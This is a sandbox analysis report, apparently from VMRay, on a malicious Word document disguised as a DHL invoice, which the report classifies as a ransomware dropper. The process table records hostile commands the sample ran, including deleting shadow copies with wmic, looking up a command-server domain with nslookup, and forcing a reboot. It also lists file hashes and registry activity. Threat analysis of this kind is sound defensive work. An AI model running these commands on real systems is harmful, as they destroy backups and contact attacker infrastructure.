19946f67...3912 | Grouped Behavior
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Target: win7_64_sp1-mso2016 | ms_office
Classification: Dropper, Downloader, Ransomware

19946f67da2384266eeac70e3956c213dce0958f3af7d6bfa5e28ea13cfb3912 (SHA256)

dhl_invoice_18553.doc

Word Document

Created at 2018-05-29 01:38:00

...

Notifications (2/2)

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

The overall sleep time of all monitored processes was truncated from "10 seconds" to "10 seconds" to reveal dormant functionality.

Grouped Sequential

Monitored Processes

Process Graph

Process Graph Legend
Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xa60 Analysis Target Medium winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" -
#2 0x870 Child Process Medium rt0fv0ph.exe "C:\Users\Public\RT0FV0pH.exe" #1
#4 0x424 Child Process System (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #2
#5 0xbd0 Child Process System (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #2
#6 0x48c Child Process System (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #2
#7 0x20c Child Process System (Elevated) wmic.exe "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete #2
#12 0x554 Child Process System (Elevated) cmd.exe "C:\Windows\System32\cmd.exe" /c shutdown -r -t 60 -f #2
#13 0xb08 Child Process System (Elevated) iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome #2
#14 0xb14 Child Process System (Elevated) shutdown.exe shutdown -r -t 60 -f #12
#15 0x9a4 Child Process System (Elevated) ie4uinit.exe "C:\Windows\SysWOW64\ie4uinit.exe" -ShowQLIcon #13

Behavior Information - Grouped by Category

Process #1: winword.exe
411 0
»
Information Value
ID #1
File Name c:\program files\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:02:48, Reason: Analysis Target
Unmonitor End Time: 00:04:55, Reason: Terminated by Timeout
Monitor Duration 00:02:07
OS Process Information
»
Information Value
PID 0xa60
Parent PID 0x5a8 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x BA4
0x BA0
0x B9C
0x B98
0x B1C
0x B10
0x AC4
0x AAC
0x AA8
0x AA4
0x AA0
0x A9C
0x A98
0x A94
0x A90
0x A88
0x A84
0x A80
0x A7C
0x A70
0x A68
0x A64
0x 840
0x 850
0x 794
0x 860
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000000000020000 0x00020000 0x00020fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000040000 0x00040000 0x00043fff Pagefile Backed Memory Readable False False False -
private_0x0000000000050000 0x00050000 0x0005ffff Private Memory Readable, Writable False False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable False False False -
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory Readable, Writable False False False -
locale.nls 0x00170000 0x001d6fff Memory Mapped File Readable False False False -
private_0x00000000001e0000 0x001e0000 0x001e0fff Private Memory Readable, Writable False False False -
pagefile_0x00000000001f0000 0x001f0000 0x001f0fff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000000000200000 0x00200000 0x00206fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000210000 0x00210000 0x00211fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000000220000 0x00220000 0x00220fff Private Memory Readable, Writable False False False -
private_0x0000000000230000 0x00230000 0x00230fff Private Memory Readable, Writable False False False -
pagefile_0x0000000000240000 0x00240000 0x00241fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000250000 0x00250000 0x00251fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000260000 0x00260000 0x00262fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000270000 0x00270000 0x00271fff Pagefile Backed Memory Readable False False False -
private_0x0000000000280000 0x00280000 0x0028ffff Private Memory - False False False -
pagefile_0x0000000000290000 0x00290000 0x00292fff Pagefile Backed Memory Readable False False False -
private_0x00000000002a0000 0x002a0000 0x0039ffff Private Memory Readable, Writable False False False -
private_0x00000000003a0000 0x003a0000 0x0049ffff Private Memory Readable, Writable False False False -
pagefile_0x00000000004a0000 0x004a0000 0x00627fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000630000 0x00630000 0x007b0fff Pagefile Backed Memory Readable False False False -
pagefile_0x00000000007c0000 0x007c0000 0x01bbffff Pagefile Backed Memory Readable False False False -
sortdefault.nls 0x01bc0000 0x01e8efff Memory Mapped File Readable False False False -
pagefile_0x0000000001e90000 0x01e90000 0x02282fff Pagefile Backed Memory Readable False False False -
private_0x0000000002290000 0x02290000 0x0238ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002390000 0x02390000 0x02392fff Pagefile Backed Memory Readable False False False -
pagefile_0x00000000023a0000 0x023a0000 0x023a2fff Pagefile Backed Memory Readable False False False -
pagefile_0x00000000023b0000 0x023b0000 0x023b2fff Pagefile Backed Memory Readable False False False -
private_0x00000000023c0000 0x023c0000 0x023cffff Private Memory Readable, Writable False False False -
private_0x00000000023d0000 0x023d0000 0x025cffff Private Memory Readable, Writable False False False -
pagefile_0x00000000025d0000 0x025d0000 0x025d2fff Pagefile Backed Memory Readable False False False -
private_0x00000000025e0000 0x025e0000 0x0261ffff Private Memory Readable, Writable False False False -
private_0x0000000002620000 0x02620000 0x02620fff Private Memory Readable, Writable False False False -
private_0x0000000002630000 0x02630000 0x0263efff Private Memory Readable, Writable False False False -
private_0x0000000002640000 0x02640000 0x026bffff Private Memory Readable, Writable False False False -
pagefile_0x00000000026c0000 0x026c0000 0x0279efff Pagefile Backed Memory Readable False False False -
private_0x00000000027d0000 0x027d0000 0x027d0fff Private Memory Readable, Writable False False False -
private_0x00000000027e0000 0x027e0000 0x028dffff Private Memory Readable, Writable False False False -
pagefile_0x00000000028e0000 0x028e0000 0x028e0fff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x00000000028f0000 0x028f0000 0x028f1fff Pagefile Backed Memory Readable False False False -
private_0x0000000002900000 0x02900000 0x029fffff Private Memory Readable, Writable False False False -
kernelbase.dll.mui 0x02a00000 0x02abffff Memory Mapped File Readable, Writable False False False -
segoeuib.ttf 0x02ac0000 0x02b39fff Memory Mapped File Readable False False False -
pagefile_0x0000000002b50000 0x02b50000 0x02b51fff Pagefile Backed Memory Readable False False False -
index.dat 0x02b60000 0x02b6bfff Memory Mapped File Readable, Writable False False False -
index.dat 0x02b70000 0x02b77fff Memory Mapped File Readable, Writable False False False -
private_0x0000000002b80000 0x02b80000 0x02b8ffff Private Memory Readable, Writable False False False -
index.dat 0x02b90000 0x02b9bfff Memory Mapped File Readable, Writable False False False -
pagefile_0x0000000002ba0000 0x02ba0000 0x02ba0fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000002bb0000 0x02bb0000 0x02bb0fff Pagefile Backed Memory Readable False False False -
private_0x0000000002bc0000 0x02bc0000 0x02bcffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002bd0000 0x02bd0000 0x02bd0fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000002be0000 0x02be0000 0x02be0fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000002bf0000 0x02bf0000 0x02bf4fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000002c00000 0x02c00000 0x02c00fff Private Memory Readable, Writable False False False -
private_0x0000000002c10000 0x02c10000 0x02c10fff Private Memory Readable, Writable False False False -
private_0x0000000002c20000 0x02c20000 0x02c31fff Private Memory Readable, Writable False False False -
private_0x0000000002c50000 0x02c50000 0x02d4ffff Private Memory Readable, Writable False False False -
private_0x0000000002d50000 0x02d50000 0x02d61fff Private Memory Readable, Writable False False False -
private_0x0000000002d70000 0x02d70000 0x02d70fff Private Memory Readable, Writable False False False -
private_0x0000000002d80000 0x02d80000 0x02d9efff Private Memory Readable, Writable False False False -
private_0x0000000002da0000 0x02da0000 0x02dbefff Private Memory Readable, Writable False False False -
private_0x0000000002dc0000 0x02dc0000 0x02ddefff Private Memory Readable, Writable False False False -
private_0x0000000002de0000 0x02de0000 0x02e00fff Private Memory Readable, Writable False False False -
private_0x0000000002e10000 0x02e10000 0x02e2dfff Private Memory Readable, Writable False False False -
private_0x0000000002e30000 0x02e30000 0x02e4efff Private Memory Readable, Writable False False False -
private_0x0000000002e60000 0x02e60000 0x02edffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002ee0000 0x02ee0000 0x02ee1fff Pagefile Backed Memory Readable False False False -
msxml6r.dll 0x02ef0000 0x02ef0fff Memory Mapped File Readable False False False -
private_0x0000000002f00000 0x02f00000 0x02f7ffff Private Memory Readable, Writable False False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db 0x02f80000 0x02f9ffff Memory Mapped File Readable False False False -
pagefile_0x0000000002fa0000 0x02fa0000 0x02fa0fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000002fb0000 0x02fb0000 0x02fcefff Private Memory Readable, Writable False False False -
pagefile_0x0000000002fd0000 0x02fd0000 0x02fd1fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000002fe0000 0x02fe0000 0x030dffff Private Memory Readable, Writable False False False -
private_0x00000000030e0000 0x030e0000 0x030fefff Private Memory Readable, Writable False False False -
private_0x0000000003100000 0x03100000 0x0311dfff Private Memory Readable, Writable False False False -
private_0x0000000003120000 0x03120000 0x03120fff Private Memory Readable, Writable False False False -
pagefile_0x0000000003140000 0x03140000 0x03141fff Pagefile Backed Memory Readable False False False -
private_0x0000000003150000 0x03150000 0x0315ffff Private Memory Readable, Writable False False False -
c_1255.nls 0x03160000 0x03170fff Memory Mapped File Readable False False False -
private_0x0000000003180000 0x03180000 0x0327ffff Private Memory Readable, Writable False False False -
private_0x0000000003280000 0x03280000 0x0337ffff Private Memory Readable, Writable False False False -
segoeui.ttf 0x03380000 0x033fefff Memory Mapped File Readable False False False -
pagefile_0x0000000003400000 0x03400000 0x03400fff Pagefile Backed Memory Readable False False False -
private_0x0000000003410000 0x03410000 0x0342efff Private Memory Readable, Writable False False False -
private_0x0000000003440000 0x03440000 0x0353ffff Private Memory Readable, Writable False False False -
seguisb.ttf 0x03540000 0x035a3fff Memory Mapped File Readable False False False -
private_0x00000000035b0000 0x035b0000 0x0362ffff Private Memory Readable, Writable, Executable False False False -
private_0x0000000003630000 0x03630000 0x0372ffff Private Memory Readable, Writable False False False -
private_0x0000000003730000 0x03730000 0x03b2ffff Private Memory Readable, Writable False False False -
private_0x0000000003b30000 0x03b30000 0x03c2ffff Private Memory Readable, Writable False False False -
private_0x0000000003c30000 0x03c30000 0x03c77fff Private Memory Readable, Writable False False False -
private_0x0000000003c80000 0x03c80000 0x03c9efff Private Memory Readable, Writable False False False -
private_0x0000000003ca0000 0x03ca0000 0x03ca0fff Private Memory Readable, Writable False False False -
private_0x0000000003cc0000 0x03cc0000 0x03d3ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000003d50000 0x03d50000 0x03d51fff Pagefile Backed Memory Readable False False False -
private_0x0000000003d60000 0x03d60000 0x03d7efff Private Memory Readable, Writable False False False -
private_0x0000000003d90000 0x03d90000 0x03d9ffff Private Memory Readable, Writable False False False -
private_0x0000000003db0000 0x03db0000 0x03eaffff Private Memory Readable, Writable False False False -
~dfad6344b870861916.tmp 0x03de0000 0x03e5ffff Memory Mapped File Readable, Writable True True False
...
private_0x0000000003eb0000 0x03eb0000 0x03ef7fff Private Memory Readable, Writable False False False -
private_0x0000000003f70000 0x03f70000 0x0406ffff Private Memory Readable, Writable False False False -
private_0x0000000004100000 0x04100000 0x0417ffff Private Memory Readable, Writable False False False -
private_0x0000000004210000 0x04210000 0x0430ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000004310000 0x04310000 0x04652fff Pagefile Backed Memory Readable False False False -
tahoma.ttf 0x04660000 0x0470afff Memory Mapped File Readable False False False -
private_0x0000000004710000 0x04710000 0x0480ffff Private Memory Readable, Writable False False False -
private_0x00000000048c0000 0x048c0000 0x049bffff Private Memory Readable, Writable False False False -
private_0x0000000004a50000 0x04a50000 0x04b4ffff Private Memory Readable, Writable False False False -
private_0x0000000004bb0000 0x04bb0000 0x04caffff Private Memory Readable, Writable False False False -
private_0x0000000004d20000 0x04d20000 0x04d2ffff Private Memory Readable, Writable False False False -
private_0x0000000004d40000 0x04d40000 0x04e3ffff Private Memory Readable, Writable False False False -
private_0x0000000004e70000 0x04e70000 0x04f6ffff Private Memory Readable, Writable False False False -
private_0x0000000004f90000 0x04f90000 0x0508ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000005090000 0x05090000 0x0588ffff Pagefile Backed Memory Readable, Writable False False False -
staticcache.dat 0x05890000 0x061bffff Memory Mapped File Readable False False False -
pagefile_0x00000000061c0000 0x061c0000 0x069bffff Pagefile Backed Memory Readable, Writable False False False -
private_0x00000000069c0000 0x069c0000 0x071bffff Private Memory Readable, Writable False False False -
private_0x00000000071c0000 0x071c0000 0x072bffff Private Memory Readable, Writable False False False -
private_0x0000000007320000 0x07320000 0x0741ffff Private Memory Readable, Writable False False False -
private_0x0000000007420000 0x07420000 0x0761ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000007620000 0x07620000 0x0861ffff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000008640000 0x08640000 0x0873ffff Private Memory Readable, Writable False False False -
private_0x00000000087d0000 0x087d0000 0x0884ffff Private Memory Readable, Writable False False False -
private_0x0000000008870000 0x08870000 0x0896ffff Private Memory Readable, Writable False False False -
private_0x0000000008a30000 0x08a30000 0x08aaffff Private Memory Readable, Writable False False False -
private_0x0000000008ab0000 0x08ab0000 0x08eaffff Private Memory Readable, Writable False False False -
private_0x0000000008eb0000 0x08eb0000 0x092b0fff Private Memory Readable, Writable False False False -
private_0x00000000092c0000 0x092c0000 0x096c0fff Private Memory Readable, Writable False False False -
private_0x00000000096d0000 0x096d0000 0x09ad0fff Private Memory Readable, Writable False False False -
private_0x0000000009ae0000 0x09ae0000 0x0aaaffff Private Memory Readable, Writable False False False -
private_0x000000000aab0000 0x0aab0000 0x0bab0fff Private Memory Readable, Writable False False False -
private_0x000000000bac0000 0x0bac0000 0x0bf7cfff Private Memory Readable, Writable False False False -
private_0x000000000bf80000 0x0bf80000 0x0c37ffff Private Memory Readable, Writable False False False -
~df9fa2fe25e5f1215b.tmp 0x0c380000 0x0c3fffff Memory Mapped File Readable, Writable True True False
...
private_0x000000000c420000 0x0c420000 0x0c51ffff Private Memory Readable, Writable False False False -
private_0x000000000c520000 0x0c520000 0x0c61ffff Private Memory Readable, Writable False False False -
~df5093b2db8a0b87fe.tmp 0x0c620000 0x0c69ffff Memory Mapped File Readable, Writable True True False
...
private_0x000000000c6a0000 0x0c6a0000 0x0c79ffff Private Memory Readable, Writable False False False -
office.odf 0x0c7a0000 0x0c9bcfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000036e00000 0x36e00000 0x36e0ffff Private Memory Readable, Writable, Executable False False False -
private_0x0000000036f30000 0x36f30000 0x36f3ffff Private Memory Readable, Writable, Executable False False False -
osppc.dll 0x74460000 0x74492fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76cd0000 0x76deefff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76df0000 0x76ee9fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x770b0000 0x770b6fff Memory Mapped File Readable, Writable, Executable False False False -
normaliz.dll 0x770c0000 0x770c2fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable False False False -
For performance reasons, the remaining 434 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\roaming\microsoft\forms\winword.box 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 		False
...
c:\users\public\rt0fv0ph.exe 267.01 KB MD5: 6f2b624a9842077153a70c5c9b71c981
SHA1: 00debbb1aa7be7491183376e0e219f127dabac88
SHA256: 3956a5a371dc2294897c479d4f86f44bf89b2cebfcee62a263f589e116ce8b7f 		False
...
Host Behavior
COM (6)
»
Operation Class Interface Additional Information Success Count Logfile
Create AC9F2F90-E877-11CE-9F68-00AA00574A4F 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER True 1
Fn
Create B5F8350B-0548-48B1-A6EE-88BD00B4A5E7 6E26E776-04F0-495D-80E4-3330352E3169 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 2
Fn
Create C62A69F0-16DC-11CE-9E98-00AA00574A4F 00000001-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER True 1
Fn
Create AFB40FFD-B609-40A3-9828-F88BBE11E4E3 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create 72C24DD5-D70A-438B-8A42-98424B88AFB8 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
File (2)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\Public\RT0FV0pH.exe file_attributes = _O_RDWR, _O_CREAT, _O_EXCL True 1
Fn
Write C:\Users\Public\RT0FV0pH.exe size = 273417 True 1
Fn
Data
Registry (177)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Licenses - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 - False 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 - False 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 5
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9 - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\DesignerFeatures - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Typelib - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Typelib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{82B02373-B5BC-11CF-810F-00A0C9030074} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{82B02373-B5BC-11CF-810F-00A0C9030074}\Control - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{82B02373-B5BC-11CF-810F-00A0C9030074}\Insertable - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{82B02374-B5BC-11CF-810F-00A0C9030074} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{82B02374-B5BC-11CF-810F-00A0C9030074}\Control - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{82B02374-B5BC-11CF-810F-00A0C9030074}\Insertable - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{82B02375-B5BC-11CF-810F-00A0C9030074} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{82B02375-B5BC-11CF-810F-00A0C9030074}\Control - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{82B02375-B5BC-11CF-810F-00A0C9030074}\Insertable - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{8A683C92-BA84-11CF-8110-00A0C9030074} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{8A683C92-BA84-11CF-8110-00A0C9030074}\Control - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{8A683C92-BA84-11CF-8110-00A0C9030074}\Insertable - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{8A683C93-BA84-11CF-8110-00A0C9030074} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{8A683C93-BA84-11CF-8110-00A0C9030074}\Control - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{8A683C93-BA84-11CF-8110-00A0C9030074}\Insertable - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{1C3B4210-F441-11CE-B9EA-00AA006B1A69} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}\Control - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}\Insertable - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{909E0AE0-16DC-11CE-9E98-00AA00574A4F} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{909E0AE0-16DC-11CE-9E98-00AA00574A4F}\Control - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{909E0AE0-16DC-11CE-9E98-00AA00574A4F}\Insertable - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{AFC20920-DA4E-11CE-B943-00AA006887B4} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{AFC20920-DA4E-11CE-B943-00AA006887B4}\Control - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{AFC20920-DA4E-11CE-B943-00AA006887B4}\Insertable - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{5CEF5610-713D-11CE-80C9-00AA00611080} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{5CEF5610-713D-11CE-80C9-00AA00611080}\Control - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{5CEF5610-713D-11CE-80C9-00AA00611080}\Insertable - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{646BE917-EFED-46C6-AFC9-CA1FBD3C5100} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{646BE917-EFED-46C6-AFC9-CA1FBD3C5100}\Control - False 1
Fn
Open Key HKEY_CLASSES_ROOT\Clsid\{646BE917-EFED-46C6-AFC9-CA1FBD3C5100}\Insertable - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 11
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 3
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 6
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\VBA\VBE\6.0\Addins64 - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\Designers - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\ToolboxControls - False 1
Fn
Read Value HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 data = } False 1
Fn
